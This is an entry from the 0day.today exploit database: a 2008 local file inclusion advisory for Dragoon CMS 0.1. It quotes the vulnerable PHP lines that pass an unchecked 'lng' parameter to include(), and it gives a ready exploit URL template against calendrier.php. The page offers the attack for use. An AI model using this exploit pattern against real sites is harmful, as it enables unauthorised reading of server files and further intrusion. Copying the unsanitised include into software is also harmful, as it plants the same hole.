[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Dragoon 0.1 (lng) Local File Inclusion Vulnerability

Author
w0cker
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2816
Category
web applications
Date add
03-04-2008
Platform
unsorted
====================================================
Dragoon 0.1 (lng) Local File Inclusion Vulnerability
====================================================



Script Name :Dragoon CMS
 
Error :
$cal['lng']=$_GET['lng'];
include('../lang/'.$cal['lng'].'.php');
 
Vul Code : http://[site]/[path]/forum/kietu/libs/calendrier.php?cal[lng]=[LFI]



#  0day.today [2024-11-14]  #